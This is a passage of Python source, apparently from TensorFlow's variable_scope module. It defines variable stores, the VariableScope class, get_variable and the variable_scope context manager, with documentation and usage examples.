(name, dtype_str, found_type_str)) return found_var # The code below handles only the case of creating a new variable. if reuse is True: raise ValueError("Variable %s does not exist, or was not created with " "tf.get_variable(). Did you mean to set " "reuse=tf.AUTO_REUSE in VarScope?" % name) # Create the tensor to initialize the variable with default value. if initializer is None: initializer, initializing_from_value = self._get_default_initializer( name=name, shape=shape, dtype=dtype) # Enter an init scope when creating the initializer. with ops.init_scope(): if initializing_from_value: init_val = initializer variable_dtype = None else: # Instantiate initializer if provided initializer is a type object. if isinstance(initializer, type(init_ops.Initializer)): initializer = initializer(dtype=dtype) if shape and shape.is_fully_defined(): init_val = lambda: initializer( # pylint: disable=g-long-lambda shape.as_list(), dtype=dtype, partition_info=partition_info) elif not tf_inspect.getargspec(initializer).args: init_val = initializer else: raise ValueError("You can only pass an initializer function that " "expects no arguments to its callable when the " "shape is not fully defined. The given initializer " "function expects the following args %s" % tf_inspect.getargspec(initializer).args) variable_dtype = dtype.base_dtype # Create the variable. if use_resource is None: # Set the default value if unspecified. use_resource = _DEFAULT_USE_RESOURCE v = variables.VariableV1( initial_value=init_val, name=name, trainable=trainable, collections=collections, caching_device=caching_device, dtype=variable_dtype, validate_shape=validate_shape, constraint=constraint, use_resource=use_resource, synchronization=synchronization, aggregation=aggregation) if context.executing_eagerly() and self._store_eager_variables: if collections: ops.add_to_collections(collections, v) else: ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v) if trainable: ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v) if not context.executing_eagerly() or self._store_eager_variables: # In eager mode we do not want to keep default references to Variable # objects as this will prevent their memory from being released. self._vars[name] = v logging.vlog(1, "Created variable %s with shape %s and init %s", v.name, format(shape), initializer) # Run the regularizer if requested and save the resulting loss. if regularizer: with ops.colocate_with(v): with ops.name_scope(name + "/Regularizer/"): loss = regularizer(v) if loss is not None: if context.executing_eagerly(): v_name = "v_%s" % type(v) loss_name = "loss_%s" % type(loss) else: v_name = v.name loss_name = loss.name logging.vlog(1, "Applied regularizer to %s and added the result %s " "to REGULARIZATION_LOSSES.", v_name, loss_name) ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss) return v # Initialize variable when no initializer provided def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32): """Provide a default initializer and a corresponding value. Args: name: see get_variable. shape: see get_variable. dtype: see get_variable. Returns: initializer and initializing_from_value. See get_variable above. Raises: ValueError: When giving unsupported dtype. """ del shape # If dtype is DT_FLOAT, provide a uniform unit scaling initializer if dtype.is_floating: initializer = init_ops.glorot_uniform_initializer() initializing_from_value = False # If dtype is DT_INT/DT_UINT, provide a default value `zero` # If dtype is DT_BOOL, provide a default value `FALSE` elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or dtype == dtypes.string): initializer = init_ops.zeros_initializer() initializing_from_value = False # NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here? else: raise ValueError("An initializer for variable %s of %s is required" % (name, dtype.base_dtype)) return initializer, initializing_from_value # To stop regularization, use this regularizer @tf_export("no_regularizer") def no_regularizer(_): """Use this function to prevent regularization of variables.""" return None # TODO(alive): support caching devices and partitioned variables in Eager mode. @tf_export(v1=["VariableScope"]) class VariableScope(object): """Variable scope object to carry defaults to provide to `get_variable`. Many of the arguments we need for `get_variable` in a variable store are most easily handled with a context. This object is used for the defaults. Attributes: name: name of the current scope, used as prefix in get_variable. initializer: default initializer passed to get_variable. regularizer: default regularizer passed to get_variable. reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in get_variable. When eager execution is enabled this argument is always forced to be False. caching_device: string, callable, or None: the caching device passed to get_variable. partitioner: callable or `None`: the partitioner passed to `get_variable`. custom_getter: default custom getter passed to get_variable. name_scope: The name passed to `tf.name_scope`. dtype: default type passed to get_variable (defaults to DT_FLOAT). use_resource: if False, create a normal Variable; if True create an experimental ResourceVariable with well-defined semantics. Defaults to False (will later change to True). When eager execution is enabled this argument is always forced to be True. constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. """ def __init__(self, reuse, name="", initializer=None, regularizer=None, caching_device=None, partitioner=None, custom_getter=None, name_scope="", dtype=dtypes.float32, use_resource=None, constraint=None): """Creates a new VariableScope with the given properties.""" self._name = name self._initializer = initializer self._regularizer = regularizer self._reuse = reuse self._caching_device = caching_device self._partitioner = partitioner self._custom_getter = custom_getter self._name_scope = name_scope self._dtype = dtype self._use_resource = use_resource self._constraint = constraint if context.executing_eagerly(): if self._caching_device is not None: raise NotImplementedError("Caching devices is not yet supported " "when eager execution is enabled.") if self._partitioner is not None: raise NotImplementedError("Partitioned variables are not yet supported " "when eager execution is enabled.") self._reuse = AUTO_REUSE self._use_resource = True @property def name(self): return self._name @property def original_name_scope(self): return self._name_scope @property def reuse(self): return self._reuse @property def initializer(self): return self._initializer @property def dtype(self): return self._dtype @property def use_resource(self): return self._use_resource @property def regularizer(self): return self._regularizer @property def caching_device(self): return self._caching_device @property def partitioner(self): return self._partitioner @property def custom_getter(self): return self._custom_getter @property def constraint(self): return self._constraint def reuse_variables(self): """Reuse variables in this scope.""" self._reuse = True def set_initializer(self, initializer): """Set initializer for this scope.""" self._initializer = initializer def set_dtype(self, dtype): """Set data type for this scope.""" self._dtype = dtype def set_use_resource(self, use_resource): """Sets whether to use ResourceVariables for this scope.""" if context.executing_eagerly() and not use_resource: raise ValueError("When eager execution is enabled, " "use_resource cannot be set to false.") self._use_resource = use_resource def set_regularizer(self, regularizer): """Set regularizer for this scope.""" self._regularizer = regularizer def set_caching_device(self, caching_device): """Set caching_device for this scope.""" if context.executing_eagerly(): raise NotImplementedError("Caching devices are not yet supported " "when eager execution is enabled.") self._caching_device = caching_device def set_partitioner(self, partitioner): """Set partitioner for this scope.""" if partitioner and context.executing_eagerly(): raise NotImplementedError("Partitioned variables are not yet supported " "when eager execution is enabled.") self._partitioner = partitioner def set_custom_getter(self, custom_getter): """Set custom getter for this scope.""" self._custom_getter = custom_getter def get_collection(self, name): """Get this scope's variables.""" scope = self._name + "/" if self._name else "" return ops.get_collection(name, scope) def trainable_variables(self): """Get this scope's trainable variables.""" return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES) def global_variables(self): """Get this scope's global variables.""" return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES) def local_variables(self): """Get this scope's local variables.""" return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES) def get_variable(self, var_store, name, shape=None, dtype=None, initializer=None, regularizer=None, reuse=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, custom_getter=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): """Gets an existing variable with this name or create a new one.""" if regularizer is None: regularizer = self._regularizer if caching_device is None: caching_device = self._caching_device if partitioner is None: partitioner = self._partitioner if custom_getter is None: custom_getter = self._custom_getter if context.executing_eagerly(): reuse = False use_resource = True else: if reuse is None: reuse = self._reuse if use_resource is None: use_resource = self._use_resource full_name = self.name + "/" + name if self.name else name # Variable names only depend on variable_scope (full_name here), # not name_scope, so we reset it below for the time of variable creation. with ops.name_scope(None): # Check that `initializer` dtype and `dtype` are consistent before # replacing them with defaults. if (dtype is not None and initializer is not None and not callable(initializer)): init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype if init_dtype != dtype: raise ValueError("Initializer type '%s' and explicit dtype '%s' " "don't match." % (init_dtype, dtype)) if initializer is None: initializer = self._initializer if constraint is None: constraint = self._constraint if dtype is None: dtype = self._dtype return var_store.get_variable( full_name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, custom_getter=custom_getter, constraint=constraint, synchronization=synchronization, aggregation=aggregation) def _get_partitioned_variable(self, var_store, name, shape=None, dtype=None, initializer=None, regularizer=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, constraint=None): """Gets an existing variable with this name or create a new one.""" if context.executing_eagerly(): raise NotImplementedError("Partitioned variables are not yet supported " "when eager execution is enabled.") if initializer is None: initializer = self._initializer if regularizer is None: regularizer = self._regularizer if constraint is None: constraint = self._constraint if caching_device is None: caching_device = self._caching_device if partitioner is None: partitioner = self._partitioner if dtype is None: dtype = self._dtype if use_resource is None: use_resource = self._use_resource if self._custom_getter is not None: raise ValueError( "Private access to _get_partitioned_variable is not allowed when " "a custom getter is set. Current custom getter: %s. " "It is likely that you're using create_partitioned_variables. " "If so, consider instead using get_variable with a non-empty " "partitioner parameter instead." % self._custom_getter) if partitioner is None: raise ValueError("No partitioner was specified") # This allows the variable scope name to be used as the variable name if # this function is invoked with an empty name arg, for backward # compatibility with create_partitioned_variables(). full_name_list = [] if self.name: full_name_list.append(self.name) if name: full_name_list.append(name) full_name = "/".join(full_name_list) # Variable names only depend on variable_scope (full_name here), # not name_scope, so we reset it below for the time of variable creation. with ops.name_scope(None): # pylint: disable=protected-access return var_store._get_partitioned_variable( full_name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=self.reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # pylint: enable=protected-access _VARSTORE_KEY = ("__variable_store",) _VARSCOPESTORE_KEY = ("__varscope",) class _VariableScopeStore(threading.local): """A thread local store for the current variable scope and scope counts.""" def __init__(self): super(_VariableScopeStore, self).__init__() self.current_scope = VariableScope(False) self.variable_scopes_count = {} def open_variable_scope(self, scope_name): if scope_name in self.variable_scopes_count: self.variable_scopes_count[scope_name] += 1 else: self.variable_scopes_count[scope_name] = 1 def close_variable_subscopes(self, scope_name): for k in list(self.variable_scopes_count.keys()): if scope_name is None or k.startswith(scope_name + "/"): self.variable_scopes_count[k] = 0 def variable_scope_count(self, scope_name): return self.variable_scopes_count.get(scope_name, 0) def get_variable_scope_store(): """Returns the variable scope store for current thread.""" scope_store = ops.get_collection(_VARSCOPESTORE_KEY) if not scope_store: scope_store = _VariableScopeStore() ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store) else: scope_store = scope_store[0] return scope_store @tf_export(v1=["get_variable_scope"]) def get_variable_scope(): """Returns the current variable scope.""" return get_variable_scope_store().current_scope def _get_default_variable_store(): store = ops.get_collection(_VARSTORE_KEY) if store: return store[0] store = _VariableStore() ops.add_to_collection(_VARSTORE_KEY, store) return store @tf_contextlib.contextmanager def with_variable_store(store): store_collection = ops.get_collection_ref(_VARSTORE_KEY) old = list(store_collection) store_collection[:] = [store] try: yield finally: store_collection[:] = old class EagerVariableStore(object): """Wrapper allowing functional layers to be used with eager execution. When eager execution is enabled Variables get deleted when they go out of scope, and are not stored in global collections by default. A lot of code (mostly the functional layers in tf.layers) assumes that variables are kept in a global list. EagerVariableStore can be used in conjunction with this code to make it eager-friendly. For example, to create a dense layer, use: ``` container = tfe.EagerVariableStore() for input in dataset_iterator: with container.as_default(): x = tf.layers.dense(input, name="l1") print(container.variables) # Should print the variables used in the layer. ``` """ def __init__(self, store=None): if store is not None: if not store._store_eager_variables: # pylint: disable=protected-access raise ValueError("Cannot construct EagerVariableStore from a " "VariableStore object that does not hold eager " "variables.") self._store = store else: self._store = _VariableStore() self._store._store_eager_variables = True # pylint: disable=protected-access def as_default(self): return with_variable_store(self._store) def variables(self): return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access def trainable_variables(self): # pylint: disable=protected-access return sorted([x for x in self._store._vars.values() if x.trainable], key=lambda x: x.name) # pylint: enable=protected-access def non_trainable_variables(self): # pylint: disable=protected-access return sorted([x for x in self._store._vars.values() if not x.trainable], key=lambda x: x.name) # pylint: enable=protected-access def copy(self): """Copy this variable store and all of its contents. Variables contained in this store will be copied over to the new variable store, meaning that they can be modified without affecting the variables in this store. Returns: A new EagerVariableStore instance containing copied variables. """ # pylint: disable=protected-access new_store = EagerVariableStore() for key, var in iteritems(self._store._vars): # Strip device out of variable name. try: index = var.name.index(":") except ValueError: stripped_var_name = var.name else: stripped_var_name = var.name[:index] # Create new variable with same value, name, and "trainable" flag. new_var = resource_variable_ops.ResourceVariable( var.read_value(), name=stripped_var_name, trainable=var.trainable) new_store._store._vars[key] = new_var return new_store # pylint: enable=protected-access # The argument list for get_variable must match arguments to get_local_variable. # So, if you are updating the arguments, also update arguments to # get_local_variable below. @tf_export(v1=["get_variable"]) def get_variable(name, shape=None, dtype=None, initializer=None, regularizer=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, custom_getter=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): return get_variable_scope().get_variable( _get_default_variable_store(), name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, custom_getter=custom_getter, constraint=constraint, synchronization=synchronization, aggregation=aggregation) get_variable_or_local_docstring = ("""%s %sThis function prefixes the name with the current variable scope and performs reuse checks. See the [Variable Scope How To](https://tensorflow.org/guide/variables) for an extensive description of how reusing works. Here is a basic example: ```python def foo(): with tf.variable_scope("foo", reuse=tf.AUTO_REUSE): v = tf.get_variable("v", [1]) return v v1 = foo() # Creates v. v2 = foo() # Gets the same, existing v. assert v1 == v2 ``` If initializer is `None` (the default), the default initializer passed in the variable scope will be used. If that one is `None` too, a `glorot_uniform_initializer` will be used. The initializer can also be a Tensor, in which case the variable is initialized to this value and shape. Similarly, if the regularizer is `None` (the default), the default regularizer passed in the variable scope will be used (if that is `None` too, then by default no regularization is performed). If a partitioner is provided, a `PartitionedVariable` is returned. Accessing this object as a `Tensor` returns the shards concatenated along the partition axis. Some useful partitioners are available. See, e.g., `variable_axis_size_partitioner` and `min_max_variable_partitioner`. Args: name: The name of the new or existing variable. shape: Shape of the new or existing variable. dtype: Type of the new or existing variable (defaults to `DT_FLOAT`). initializer: Initializer for the variable if one is created. Can either be an initializer object or a Tensor. If it's a Tensor, its shape must be known unless validate_shape is False. regularizer: A (Tensor -> Tensor or None) function; the result of applying it on a newly created variable will be added to the collection `tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization. %scollections: List of graph collections keys to add the Variable to. Defaults to `[%s]` (see `tf.Variable`). caching_device: Optional device string or function describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the Variable reside, to deduplicate copying through `Switch` and other conditional statements. partitioner: Optional callable that accepts a fully defined `TensorShape` and `dtype` of the Variable to be created, and returns a list of partitions for each axis (currently only one axis can be partitioned). validate_shape: If False, allows the variable to be initialized with a value of unknown shape. If True, the default, the shape of initial_value must be known. For this to be used the initializer must be a Tensor and not an initializer object. use_resource: If False, creates a regular Variable. If true, creates an experimental ResourceVariable instead with well-defined semantics. Defaults to False (will later change to True). When eager execution is enabled this argument is always forced to be True. custom_getter: Callable that takes as a first argument the true getter, and allows overwriting the internal get_variable method. The signature of `custom_getter` should match that of this method, but the most future-proof version will allow for changes: `def custom_getter(getter, *args, **kwargs)`. Direct access to all `get_variable` parameters is also allowed: `def custom_getter(getter, name, *args, **kwargs)`. A simple identity custom getter that simply creates variables with modified names is: ```python def custom_getter(getter, name, *args, **kwargs): return getter(name + '_suffix', *args, **kwargs) ``` constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. synchronization: Indicates when a distributed a variable will be aggregated. Accepted values are constants defined in the class `tf.VariableSynchronization`. By default the synchronization is set to `AUTO` and the current `DistributionStrategy` chooses when to synchronize. If `synchronization` is set to `ON_READ`, `trainable` must not be set to `True`. aggregation: Indicates how a distributed variable will be aggregated. Accepted values are constants defined in the class `tf.VariableAggregation`. Returns: The created or existing `Variable` (or `PartitionedVariable`, if a partitioner was used). Raises: ValueError: when creating a new variable and shape is not declared, when violating reuse during variable creation, or when `initializer` dtype and `dtype` don't match. Reuse is set inside `variable_scope`. """) get_variable.__doc__ = get_variable_or_local_docstring % ( "Gets an existing variable with these parameters or create a new one.", "", "trainable: If `True` also add the variable to the graph collection\n" " `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ", "GraphKeys.GLOBAL_VARIABLES") # The argument list for get_local_variable must match arguments to get_variable. # So, if you are updating the arguments, also update arguments to get_variable. @tf_export(v1=["get_local_variable"]) def get_local_variable( # pylint: disable=missing-docstring name, shape=None, dtype=None, initializer=None, regularizer=None, trainable=False, # pylint: disable=unused-argument collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, custom_getter=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): if collections: collections += [ops.GraphKeys.LOCAL_VARIABLES] else: collections = [ops.GraphKeys.LOCAL_VARIABLES] return get_variable( name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, trainable=False, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, synchronization=synchronization, aggregation=aggregation, custom_getter=custom_getter, constraint=constraint) get_local_variable.__doc__ = get_variable_or_local_docstring % ( "Gets an existing *local* variable or creates a new one.", "Behavior is the same as in `get_variable`, except that variables are\n" "added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n" "`False`.\n", "", "GraphKeys.LOCAL_VARIABLES") def _get_partitioned_variable(name, shape=None, dtype=None, initializer=None, regularizer=None, trainable=True, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, constraint=None): """Gets or creates a sharded variable list with these parameters. The `partitioner` must be a callable that accepts a fully defined `TensorShape` and returns a sequence of integers (the `partitions`). These integers describe how to partition the given sharded `Variable` along the given dimension. That is, `partitions[1] = 3` means split the `Variable` into 3 shards along dimension 1. Currently, sharding along only one axis is supported. If the list of variables with the given name (prefix) is already stored, we return the stored variables. Otherwise, we create a new one. If initializer is `None` (the default), the default initializer passed in the constructor is used. If that one is `None` too, we use a new `glorot_uniform_initializer`. If initializer is a Tensor, we use it as a value and derive the shape from the initializer. If the initializer is a callable, then it will be called for each shard. Otherwise the initializer should match the shape of the entire sharded Variable, and it will be sliced accordingly for each shard. Some useful partitioners are available. See, e.g., `variable_axis_size_partitioner` and `min_max_variable_partitioner`. Args: name: The name of the new or existing variable. shape: Shape of the new or existing variable. dtype: Type of the new or existing variable (defaults to `DT_FLOAT`). initializer: Initializer for the variable if one is created. regularizer: A (Tensor -> Tensor or None) function; the result of applying it on a newly created variable will be added to the collection GraphKeys.REGULARIZATION_LOSSES and can be used for regularization. trainable: If `True` also add the variable to the graph collection `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). collections: List of graph collections keys to add the Variable to. Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`). caching_device: Optional device string or function describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the Variable reside, to deduplicate copying through `Switch` and other conditional statements. partitioner: Optional callable that accepts a fully defined `TensorShape` and `dtype` of the Variable to be created, and returns a list of partitions for each axis (currently only one axis can be partitioned). validate_shape: If False, allows the variable to be initialized with a value of unknown shape. If True, the default, the shape of initial_value must be known. use_resource: If False, creates a regular Variable. If True, creates an experimental ResourceVariable instead which has well-defined semantics. Defaults to False (will later change to True). constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. Returns: A tuple `(shards, partitions)` where `shards` is the list of `Variable` shards and `partitions` is the output of the partitioner on the input shape. Raises: ValueError: when creating a new variable and shape is not declared, or when violating reuse during variable creation. Reuse is set inside `variable_scope`. """ # pylint: disable=protected-access scope = get_variable_scope() if scope.custom_getter is not None: raise ValueError( "Private access to _get_partitioned_variable is not allowed when " "a custom getter is set. Current custom getter: %s. " "It is likely that you're using create_partitioned_variables. " "If so, consider instead using get_variable with a non-empty " "partitioner parameter instead." % scope.custom_getter) return scope._get_partitioned_variable( _get_default_variable_store(), name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # pylint: enable=protected-access # Named like a function for compatibility with the previous # @tf_contextlib.contextmanager definition. class _pure_variable_scope(object): # pylint: disable=invalid-name """A context for the variable_scope, see `variable_scope` for docs.""" def __init__(self, name_or_scope, reuse=None, initializer=None, regularizer=None, caching_device=None, partitioner=None, custom_getter=None, old_name_scope=None, dtype=dtypes.float32, use_resource=None, constraint=None): """Creates a context for the variable_scope, see `variable_scope` for docs. Note: this does not create a name scope. Args: name_or_scope: `string` or `VariableScope`: the scope to open. reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent scope's reuse flag. initializer: default initializer for variables within this scope. regularizer: default regularizer for variables within this scope. caching_device: default caching device for variables within this scope. partitioner: default partitioner for variables within this scope. custom_getter: default custom getter for variables within this scope. old_name_scope: the original name scope when re-entering a variable scope. dtype: type of the variables within this scope (defaults to `DT_FLOAT`). use_resource: If False, variables in this scope will be regular Variables. If True, experimental ResourceVariables will be creates instead, with well-defined semantics. Defaults to False (will later change to True). constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. """ self._name_or_scope = name_or_scope self._reuse = reuse self._initializer = initializer self._regularizer = regularizer self._caching_device = caching_device self._partitioner = partitioner self._custom_getter = custom_getter self._old_name_scope = old_name_scope self._dtype = dtype self._use_resource = use_resource self._constraint = constraint self._var_store = _get_default_variable_store() self._var_scope_store = get_variable_scope_store() if isinstance(self._name_or_scope, VariableScope): self._new_name = self._name_or_scope.name name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access # Handler for the case when we jump to a shared scope. We create a new # VariableScope (self._var_scope_object) that contains a copy of the # provided shared scope, possibly with changed reuse and initializer, if # the user requested this. variable_scope_object = VariableScope( self._name_or_scope.reuse if not self._reuse else self._reuse, name=self._new_name, initializer=self._name_or_scope.initializer, regularizer=self._name_or_scope.regularizer, caching_device=self._name_or_scope.caching_device, partitioner=self._name_or_scope.partitioner, dtype=self._name_or_scope.dtype, custom_getter=self._name_or_scope.custom_getter, name_scope=name_scope, use_resource=self._name_or_scope.use_resource, constraint=self._constraint) if self._initializer is not None: variable_scope_object.set_initializer(self._initializer) if self._regularizer is not None: variable_scope_object.set_regularizer(self._regularizer) if self._caching_device is not None: variable_scope_object.set_caching_device(self._caching_device) if self._partitioner is not None: variable_scope_object.set_partitioner(self._partitioner) if self._custom_getter is not None: variable_scope_object.set_custom_getter( _maybe_wrap_custom_getter( self._custom_getter, self._name_or_scope.custom_getter)) if self._dtype is not None: variable_scope_object.set_dtype(self._dtype) if self._use_resource is not None: variable_scope_object.set_use_resource(self._use_resource) self._cached_variable_scope_object = variable_scope_object def __enter__(self): """Begins the scope block. Returns: A VariableScope. Raises: ValueError: when trying to reuse within a create scope, or create within a reuse scope, or if reuse is not `None` or `True`. TypeError: when the types of some arguments are not appropriate. """ self._old = self._var_scope_store.current_scope if isinstance(self._name_or_scope, VariableScope): self._var_scope_store.open_variable_scope(self._new_name) self._old_subscopes = copy.copy( self._var_scope_store.variable_scopes_count) variable_scope_object = self._cached_variable_scope_object else: # Handler for the case when we just prolong current variable scope. # VariableScope with name extended by the provided one, and inherited # reuse and initializer (except if the user provided values to set). self._new_name = ( self._old.name + "/" + self._name_or_scope if self._old.name else self._name_or_scope) self._reuse = (self._reuse or self._old.reuse) # Re-using is inherited by sub-scopes. if self._old_name_scope is None: name_scope = self._name_or_scope else: name_scope = self._old_name_scope variable_scope_object = VariableScope( self._reuse, name=self._new_name, initializer=self._old.initializer, regularizer=self._old.regularizer, caching_device=self._old.caching_device, partitioner=self._old.partitioner, dtype=self._old.dtype, use_resource=self._old.use_resource, custom_getter=self._old.custom_getter, name_scope=name_scope, constraint=self._constraint) if self._initializer is not None: variable_scope_object.set_initializer(self._initializer) if self._regularizer is not None: variable_scope_object.set_regularizer(self._regularizer) if self._caching_device is not None: variable_scope_object.set_caching_device(self._caching_device) if self._partitioner is not None: variable_scope_object.set_partitioner(self._partitioner) if self._custom_getter is not None: variable_scope_object.set_custom_getter( _maybe_wrap_custom_getter(self._custom_getter, self._old.custom_getter)) if self._dtype is not None: variable_scope_object.set_dtype(self._dtype) if self._use_resource is not None: variable_scope_object.set_use_resource(self._use_resource) self._var_scope_store.open_variable_scope(self._new_name) self._var_scope_store.current_scope = variable_scope_object return variable_scope_object def __exit__(self, type_arg, value_arg, traceback_arg): # If jumping out from a non-prolonged scope, restore counts. if isinstance(self._name_or_scope, VariableScope): self._var_scope_store.variable_scopes_count = self._old_subscopes else: self._var_scope_store.close_variable_subscopes(self._new_name) self._var_scope_store.current_scope = self._old def _maybe_wrap_custom_getter(custom_getter, old_getter): """Wrap a call to a custom_getter to use the old_getter internally.""" if old_getter is None: return custom_getter # The new custom_getter should call the old one def wrapped_custom_getter(getter, *args, **kwargs): # Call: # custom_getter( # lambda: old_getter(true_getter, ...), *args, **kwargs) # which means custom_getter will call old_getter, which # will call the true_getter, perform any intermediate # processing, and return the results to the current # getter, which will also perform additional processing. return custom_getter( functools.partial(old_getter, getter), *args, **kwargs) return wrapped_custom_getter def _get_unique_variable_scope(prefix): """Get a name with the given prefix unique in the current variable scope.""" var_scope_store = get_variable_scope_store() current_scope = get_variable_scope() name = current_scope.name + "/" + prefix if current_scope.name else prefix if var_scope_store.variable_scope_count(name) == 0: return prefix idx = 1 while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0: idx += 1 return prefix + ("_%d" % idx) # Named like a function for backwards compatibility with the # @tf_contextlib.contextmanager version, which was switched to a class to avoid # some object creation overhead. @tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name class variable_scope(object): """A context manager for defining ops that creates variables (layers). This context manager validates that the (optional) `values` are from the same graph, ensures that graph is the default graph, and pushes a name scope and a variable scope. If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None, then `default_name` is used. In that case, if the same name has been previously used in the same scope, it will be made unique by appending `_N` to it. Variable scope allows you to create new variables and to share already created ones while providing checks to not create or share by accident. For details, see the [Variable Scope How To](https://tensorflow.org/guide/variables), here we present only a few basic examples. Simple example of how to create a new variable: ```python with tf.variable_scope("foo"): with tf.variable_scope("bar"): v = tf.get_variable("v", [1]) assert v.name == "foo/bar/v:0" ``` Simple example of how to reenter a premade variable scope safely: ```python with tf.variable_scope("foo") as vs: pass # Re-enter the variable scope. with tf.variable_scope(vs, auxiliary_name_scope=False) as vs1: # Restore the original name_scope. with tf.name_scope(vs1.original_name_scope): v = tf.get_variable("v", [1]) assert v.name == "foo/v:0" c = tf.constant([1], name="c") assert c.name == "foo/c:0" ``` Basic example of sharing a variable AUTO_REUSE: ```python def foo(): with tf.variable_scope("foo", reuse=tf.AUTO_REUSE): v = tf.get_variable("v", [1]) return v v1 = foo() # Creates v. v2 = foo() # Gets the same, existing v. assert v1 == v2 ``` Basic example of sharing a variable with reuse=True: ```python with tf.variable_scope("foo"): v = tf.get_variable("v", [1]) with tf.variable_scope("foo", reuse=True): v1 = tf.get_variable("v", [1]) assert v1 == v ``` Sharing a variable by capturing a scope and setting reuse: ```python with tf.variable_scope("foo") as scope: v = tf.get_variable("v", [1]) scope.reuse_variables() v1 = tf.get_variable("v", [1]) assert v1 == v ``` To prevent accidental sharing of variables, we raise an exception when getting an existing variable in a non-reusing scope. ```python with tf.variable_scope("foo"): v = tf.get_variable("v", [1]) v1 = tf.get_variable("v", [1]) # Raises ValueError("... v already exists ..."). ``` Similarly, we raise an exception when trying to get a variable that does not exist in reuse mode. ```python with tf.variable_scope("foo", reuse=True): v = tf.get_variable("v", [1]) # Raises ValueError("... v does not exists ..."). ``` Note that the `reuse` flag is inherited: if we open a reusing scope, then all its sub-scopes become reusing as well. A note about name scoping: Setting `reuse` does not impact the naming of other ops such as mult. See related discussion on [github#6189](https://github.com/tensorflow/tensorflow/issues/6189) Note that up to and including version 1.0, it was allowed (though explicitly discouraged) to pass False to the reuse argument, yielding undocumented behaviour slightly different from None. Starting at 1.1.0 passing None and False as reuse has exactly the same effect. A note about using variable scopes in multi-threaded environment: Variable scopes are thread local, so one thread will not see another thread's current scope. Also, when using `default_name`, unique scopes names are also generated only on a per thread basis. If the same name was used within a different thread, that doesn't prevent a new thread from creating the same scope. However, the underlying variable store is shared across threads (within the same graph). As such, if another thread tries to create a new variable with the same name as a variable created by a previous thread, it will fail unless reuse is True. Further, each thread starts with an empty variable scope. So if you wish to preserve name prefixes from a scope from the main thread, you should capture the main thread's scope and re-enter it in each thread. For e.g. ``` main_thread_scope = variable_scope.get_variable_scope() # Thread's target function: def thread_target_fn(captured_scope): with variable_scope.variable_scope(captured_scope): # .... regular code for this thread thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,)) ``` """ def __init__(self, name_or_scope, default_name=None, values=None, initializer=None, regularizer=None, caching_device=None, partitioner=None, custom_getter=None, reuse=None, dtype=None, use_resource=None, constraint=None, auxiliary_name_scope=True): """Initialize the context manager. Args: name_or_scope: `string` or `VariableScope`: the scope to open. default_name: The default name to use if the `name_or_scope` argument is `None`, 